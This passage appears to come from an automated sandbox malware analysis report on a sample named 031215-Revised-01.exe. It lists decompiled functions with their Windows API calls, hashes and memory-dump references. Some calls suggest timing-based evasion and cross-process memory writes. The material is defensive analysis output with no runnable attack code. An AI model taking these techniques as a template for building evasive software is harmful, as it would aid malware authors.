                                        • Opcode Fuzzy Hash: 8b556f54e4d2702cc82d70315bce2f9b0a4138119d03f0bc2cf3fcb809d55b92
                                        • Instruction Fuzzy Hash: 75018F72600304BFDB104F68DC04BAA7EEDEB84752F14822AF949D6210DBB1DD808BA0
                                        Function 000DE97B Relevance: 7.5, APIs: 5, Instructions: 47sleepCOMMON
                                        Download Yara Rule
                                        APIs
                                        • QueryPerformanceCounter.KERNEL32(?), ref: 000DE997
                                        • QueryPerformanceFrequency.KERNEL32(?), ref: 000DE9A5
                                        • Sleep.KERNEL32(00000000), ref: 000DE9AD
                                        • QueryPerformanceCounter.KERNEL32(?), ref: 000DE9B7
                                        • Sleep.KERNEL32 ref: 000DE9F3
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                        • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: PerformanceQuery$CounterSleep$Frequency
                                        • String ID:
                                        • API String ID: 2833360925-0
                                        • Opcode ID: e06c6bed41d5234eb07d4f6559f6cb8fbdb0b4fd279a6e07f27fb3de89b54ca9
                                        • Instruction ID: 5263338f04b52c40b4db5dd15b0d0b5a42a0f8d2ef80d4619d0750b40a0e6680
                                        • Opcode Fuzzy Hash: e06c6bed41d5234eb07d4f6559f6cb8fbdb0b4fd279a6e07f27fb3de89b54ca9
                                        • Instruction Fuzzy Hash: 62012931C02629DBCF50AFE5DC69AEDFB78FF09701F000656E542B6241CB709595CBA1
                                        Function 000D10F9 Relevance: 7.5, APIs: 5, Instructions: 46memoryCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 000D1114
                                        • GetLastError.KERNEL32(?,00000000,00000000,?,?,000D0B9B,?,?,?), ref: 000D1120
                                        • GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,000D0B9B,?,?,?), ref: 000D112F
                                        • HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,000D0B9B,?,?,?), ref: 000D1136
                                        • GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 000D114D
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                        • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: HeapObjectSecurityUser$AllocErrorLastProcess
                                        • String ID:
                                        • API String ID: 842720411-0
                                        • Opcode ID: 2abb05490d6ae00e93d43e5f0ea424e2b25f6bc4fb8d754935e790b60f21bd02
                                        • Instruction ID: 094e8be964b532739a2176a89a433e8a77ee5f52654e652c0deb9729144ac55e
                                        • Opcode Fuzzy Hash: 2abb05490d6ae00e93d43e5f0ea424e2b25f6bc4fb8d754935e790b60f21bd02
                                        • Instruction Fuzzy Hash: E1011D79100305FFDB114F65DC49AAA3BBEFF89360B204515FA85D7350DA71DC409EA0
                                        Function 000D0FB4 Relevance: 7.5, APIs: 5, Instructions: 43memoryCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 000D0FCA
                                        • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 000D0FD6
                                        • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 000D0FE5
                                        • HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 000D0FEC
                                        • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 000D1002
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                        • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: HeapInformationToken$AllocErrorLastProcess
                                        • String ID:
                                        • API String ID: 44706859-0
                                        • Opcode ID: 32b4ffad1555ae63d7e1194d2a3cde5b3a7254a7108267d89343f274451ac9c9
                                        • Instruction ID: ba9b0ee85fe98315472cb47b5acd1f335f3cd08592fcabae6bfff760b1e32158
                                        • Opcode Fuzzy Hash: 32b4ffad1555ae63d7e1194d2a3cde5b3a7254a7108267d89343f274451ac9c9
                                        • Instruction Fuzzy Hash: 78F04939200301FBDB215FA4AC49F963FADFF89762F204515FA85C6291CAB0DC808EA0
                                        Function 000D1014 Relevance: 7.5, APIs: 5, Instructions: 43memoryCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 000D102A
                                        • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 000D1036
                                        • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 000D1045
                                        • HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 000D104C
                                        • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 000D1062
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                        • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: HeapInformationToken$AllocErrorLastProcess
                                        • String ID:
                                        • API String ID: 44706859-0
                                        • Opcode ID: b91a7d4669bef267ee8361b7857423ada3c6656a48ef32a292cd07ef4144da7d
                                        • Instruction ID: 98658ed8a0b8a5bdceeacb7b61bea82ad6c0b53119e3a3fab0a3297c15f620e4
                                        • Opcode Fuzzy Hash: b91a7d4669bef267ee8361b7857423ada3c6656a48ef32a292cd07ef4144da7d
                                        • Instruction Fuzzy Hash: 8EF04939200301FBDB216FA4EC49F963FADFF89761F200515FA85C6250CAB0D8908EA0
                                        Function 000E030F Relevance: 7.5, APIs: 6, Instructions: 41COMMON
                                        Download Yara Rule
                                        APIs
                                        • CloseHandle.KERNEL32(?,?,?,?,000E017D,?,000E32FC,?,00000001,000B2592,?), ref: 000E0324
                                        • CloseHandle.KERNEL32(?,?,?,?,000E017D,?,000E32FC,?,00000001,000B2592,?), ref: 000E0331
                                        • CloseHandle.KERNEL32(?,?,?,?,000E017D,?,000E32FC,?,00000001,000B2592,?), ref: 000E033E
                                        • CloseHandle.KERNEL32(?,?,?,?,000E017D,?,000E32FC,?,00000001,000B2592,?), ref: 000E034B
                                        • CloseHandle.KERNEL32(?,?,?,?,000E017D,?,000E32FC,?,00000001,000B2592,?), ref: 000E0358
                                        • CloseHandle.KERNEL32(?,?,?,?,000E017D,?,000E32FC,?,00000001,000B2592,?), ref: 000E0365
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                        • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: CloseHandle
                                        • String ID:
                                        • API String ID: 2962429428-0
                                        • Opcode ID: 8601cd8ab9efa0fee776dce1afb91090e7f0c65d95cf7abad9280be9687f0880
                                        • Instruction ID: 76e7ae2bab7ac1005350f278aef25a09b985f8ac9510e5d423d8b0f032435b2e
                                        • Opcode Fuzzy Hash: 8601cd8ab9efa0fee776dce1afb91090e7f0c65d95cf7abad9280be9687f0880
                                        • Instruction Fuzzy Hash: FF01A272800B559FC7309F66D880412F7F9BF503153158A3FD19662931C3B1AA94CF80
                                        Function 000AD73A Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        • _free.LIBCMT ref: 000AD752
                                          • Part of subcall function 000A29C8: RtlFreeHeap.NTDLL(00000000,00000000,?,000AD7D1,00000000,00000000,00000000,00000000,?,000AD7F8,00000000,00000007,00000000,?,000ADBF5,00000000), ref: 000A29DE
                                          • Part of subcall function 000A29C8: GetLastError.KERNEL32(00000000,?,000AD7D1,00000000,00000000,00000000,00000000,?,000AD7F8,00000000,00000007,00000000,?,000ADBF5,00000000,00000000), ref: 000A29F0
                                        • _free.LIBCMT ref: 000AD764
                                        • _free.LIBCMT ref: 000AD776
                                        • _free.LIBCMT ref: 000AD788
                                        • _free.LIBCMT ref: 000AD79A
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                        • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: _free$ErrorFreeHeapLast
                                        • String ID:
                                        • API String ID: 776569668-0
                                        • Opcode ID: d4993a61a34fc423b5f176f9f0059757b23e8967b1bf87ac9c8de6ec9ffa8ecd
                                        • Instruction ID: 65a6ab9d69be2c789c219cb098a00256b4a6caaedbdb9dffe0a6f27659a7dc19
                                        • Opcode Fuzzy Hash: d4993a61a34fc423b5f176f9f0059757b23e8967b1bf87ac9c8de6ec9ffa8ecd
                                        • Instruction Fuzzy Hash: CFF04F32508208AFC6A5EBA8F9C5C5F77DDBB06710B950816F049E7912D720FC8087A1
                                        Function 000D5C44 Relevance: 7.5, APIs: 5, Instructions: 40windowtimeCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetDlgItem.USER32(?,000003E9), ref: 000D5C58
                                        • GetWindowTextW.USER32(00000000,?,00000100), ref: 000D5C6F
                                        • MessageBeep.USER32(00000000), ref: 000D5C87
                                        • KillTimer.USER32(?,0000040A), ref: 000D5CA3
                                        • EndDialog.USER32(?,00000001), ref: 000D5CBD
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                        • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: BeepDialogItemKillMessageTextTimerWindow
                                        • String ID:
                                        • API String ID: 3741023627-0
                                        • Opcode ID: ffec48322cfec367f90701dc78bae27e3bb208d21661c06372f53c8924d34391
                                        • Instruction ID: d25467b1b8b8a0ffb3850727ad75b5eff4c542fa2145f20a4948683e96a1aaea
                                        • Opcode Fuzzy Hash: ffec48322cfec367f90701dc78bae27e3bb208d21661c06372f53c8924d34391
                                        • Instruction Fuzzy Hash: EF018630510B04AFEB305B10DD4EFA67BB8BB00B46F04165AA983A15E1DBF5A9C48EA0
                                        Function 000A22A0 Relevance: 7.5, APIs: 5, Instructions: 30COMMON
                                        Download Yara Rule
                                        APIs
                                        • _free.LIBCMT ref: 000A22BE
                                          • Part of subcall function 000A29C8: RtlFreeHeap.NTDLL(00000000,00000000,?,000AD7D1,00000000,00000000,00000000,00000000,?,000AD7F8,00000000,00000007,00000000,?,000ADBF5,00000000), ref: 000A29DE
                                          • Part of subcall function 000A29C8: GetLastError.KERNEL32(00000000,?,000AD7D1,00000000,00000000,00000000,00000000,?,000AD7F8,00000000,00000007,00000000,?,000ADBF5,00000000,00000000), ref: 000A29F0
                                        • _free.LIBCMT ref: 000A22D0
                                        • _free.LIBCMT ref: 000A22E3
                                        • _free.LIBCMT ref: 000A22F4
                                        • _free.LIBCMT ref: 000A2305
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                        • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: _free$ErrorFreeHeapLast
                                        • String ID:
                                        • API String ID: 776569668-0
                                        • Opcode ID: 889295d67610d4f032ff0cb891637f9a2f161cb4042d53ef6eeadc88fb7e1817
                                        • Instruction ID: 31a1c20c54e3fadff194a495860ccd52b1493b2a466d4aa413a7d20443f0ee4c
                                        • Opcode Fuzzy Hash: 889295d67610d4f032ff0cb891637f9a2f161cb4042d53ef6eeadc88fb7e1817
                                        • Instruction Fuzzy Hash: 7DF03078800210AFC753AFA8BC0184D3BA4B71BB617100566F514E2A72C73009D1AFE5
                                        Function 000895C5 Relevance: 7.5, APIs: 5, Instructions: 29COMMON
                                        Download Yara Rule
                                        APIs
                                        • EndPath.GDI32(?), ref: 000895D4
                                        • StrokeAndFillPath.GDI32(?,?,000C71F7,00000000,?,?,?), ref: 000895F0
                                        • SelectObject.GDI32(?,00000000), ref: 00089603
                                        • DeleteObject.GDI32 ref: 00089616
                                        • StrokePath.GDI32(?), ref: 00089631
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                        • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: Path$ObjectStroke$DeleteFillSelect
                                        • String ID:
                                        • API String ID: 2625713937-0
                                        • Opcode ID: 4b546e2b1d008ee795818e8f787e323f19f14c2a7f619ec9eb97ca804575b967
                                        • Instruction ID: 1e770f5b8538100b0eb56a56f6727074aaa6b39cf59da736da266b7ff2cf96de
                                        • Opcode Fuzzy Hash: 4b546e2b1d008ee795818e8f787e323f19f14c2a7f619ec9eb97ca804575b967
                                        • Instruction Fuzzy Hash: DBF0EC39006708EBDB266F65ED5C7783BA5BB02326F088314F4A9558F0DB7089E5DF60
                                        Function 000A0F47 Relevance: 7.4, APIs: 2, Strings: 2, Instructions: 389COMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                        • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: __freea$_free
                                        • String ID: a/p$am/pm
                                        • API String ID: 3432400110-3206640213
                                        • Opcode ID: c0f6519f44c8b46bec39f19efb6a5abc68b4dbdc1320155c628f868f77da8e52
                                        • Instruction ID: 579234bbfacd60bc6a4b38e62723fee7bf74a614d6ddb5a4cd8050a8f1aa34b2
                                        • Opcode Fuzzy Hash: c0f6519f44c8b46bec39f19efb6a5abc68b4dbdc1320155c628f868f77da8e52
                                        • Instruction Fuzzy Hash: EAD10272900206DACF689FE8C855BFEB7F5EF07310F284159E901AB691D3759E80CB91
                                        Function 000F7B7E Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 230COMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 00090242: EnterCriticalSection.KERNEL32(0014070C,00141884,?,?,0008198B,00142518,?,?,?,000712F9,00000000), ref: 0009024D
                                          • Part of subcall function 00090242: LeaveCriticalSection.KERNEL32(0014070C,?,0008198B,00142518,?,?,?,000712F9,00000000), ref: 0009028A
                                          • Part of subcall function 00079CB3: _wcslen.LIBCMT ref: 00079CBD
                                          • Part of subcall function 000900A3: __onexit.LIBCMT ref: 000900A9
                                        • __Init_thread_footer.LIBCMT ref: 000F7BFB
                                          • Part of subcall function 000901F8: EnterCriticalSection.KERNEL32(0014070C,?,?,00088747,00142514), ref: 00090202
                                          • Part of subcall function 000901F8: LeaveCriticalSection.KERNEL32(0014070C,?,00088747,00142514), ref: 00090235
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                        • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: CriticalSection$EnterLeave$Init_thread_footer__onexit_wcslen
                                        • String ID: 5$G$Variable must be of type 'Object'.
                                        • API String ID: 535116098-3733170431
                                        • Opcode ID: 1d39635046b9d1ae973fec8ebc2ff33a8cc47d841910c9173098907327e6d6f9
                                        • Instruction ID: 1dddef348f96d3548cfa2678136826125f44a159b6bb19b845f87e4f2de43331
                                        • Opcode Fuzzy Hash: 1d39635046b9d1ae973fec8ebc2ff33a8cc47d841910c9173098907327e6d6f9
                                        • Instruction Fuzzy Hash: 69918C70A04209EFCB14EF54D991DFDB7B1BF49300F508059FA0AAB692DB71AE41EB52
                                        Function 000A8A61 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 124COMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,00000002,00000000,?,?,?,00000000,?,?,?,?), ref: 000A8B6E
                                        • GetLastError.KERNEL32(?,?,00000000,?,?,?,?,?,?,?,?,00000000,00001000,?), ref: 000A8B7A
                                        • __dosmaperr.LIBCMT ref: 000A8B81
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                        • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: ByteCharErrorLastMultiWide__dosmaperr
                                        • String ID: .
                                        • API String ID: 2434981716-3497715306
                                        • Opcode ID: 374e4d46295c36a6f668d90c2e284882ca6798fc71c0917801a823f758ba1cc4
                                        • Instruction ID: 860369fcb380ab437c743727ebe113bb7173f8225175f0158675f4ae234e1ff1
                                        • Opcode Fuzzy Hash: 374e4d46295c36a6f668d90c2e284882ca6798fc71c0917801a823f758ba1cc4
                                        • Instruction Fuzzy Hash: A8416CB0614045AFDB359FA4C880ABD7FE6DB47304B28C1A9F88587652DF31CC4297A0
                                        Function 000D2716 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 121windowCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 000DB403: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,000D21D0,?,?,00000034,00000800,?,00000034), ref: 000DB42D
                                        • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 000D2760
                                          • Part of subcall function 000DB3CE: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,000D21FF,?,?,00000800,?,00001073,00000000,?,?), ref: 000DB3F8
                                          • Part of subcall function 000DB32A: GetWindowThreadProcessId.USER32(?,?), ref: 000DB355
                                          • Part of subcall function 000DB32A: OpenProcess.KERNEL32(00000438,00000000,?,?,?,000D2194,00000034,?,?,00001004,00000000,00000000), ref: 000DB365
                                          • Part of subcall function 000DB32A: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,000D2194,00000034,?,?,00001004,00000000,00000000), ref: 000DB37B
                                        • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 000D27CD
                                        • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 000D281A
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                        • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                                        • String ID: @
                                        • API String ID: 4150878124-2766056989
                                        • Opcode ID: a770a6084f5feb658a6c51d28e582ae0eeb51122f388b538fd20b6ac6a611eba
                                        • Instruction ID: 89a3341471b7f62244578266ac085a3b5bb03d0ee269fcb3582f3b3c784c4be3
                                        • Opcode Fuzzy Hash: a770a6084f5feb658a6c51d28e582ae0eeb51122f388b538fd20b6ac6a611eba
                                        • Instruction Fuzzy Hash: 24411C72900218AFDB10DBA4CD45AEEBBB8EF19700F104056FA55B7281DB716E85DBA1
                                        Function 000A172E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 115COMMON
                                        Download Yara Rule
                                        APIs
                                        • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\031215-Revised-01.exe,00000104), ref: 000A1769
                                        • _free.LIBCMT ref: 000A1834
                                        • _free.LIBCMT ref: 000A183E
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                        • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: _free$FileModuleName
                                        • String ID: C:\Users\user\Desktop\031215-Revised-01.exe
                                        • API String ID: 2506810119-2470277103
                                        • Opcode ID: c6d46e3a2b37495c48887d6026f8199f2cfedabac5a3ea4638640c72788db894
                                        • Instruction ID: c49950d02da973a72b98b1518c0b2fa8ccf90fde04ffb8eae26934be19f1c810
                                        • Opcode Fuzzy Hash: c6d46e3a2b37495c48887d6026f8199f2cfedabac5a3ea4638640c72788db894
                                        • Instruction Fuzzy Hash: 33315075A44218FFDB21DBD99885DDEBBFCEB86710F244166F904D7211DAB08E80DB90
                                        Function 000DC27D Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 114windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 000DC306
                                        • DeleteMenu.USER32(?,00000007,00000000), ref: 000DC34C
                                        • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,00141990,014257A8), ref: 000DC395
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                        • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmpDownload File
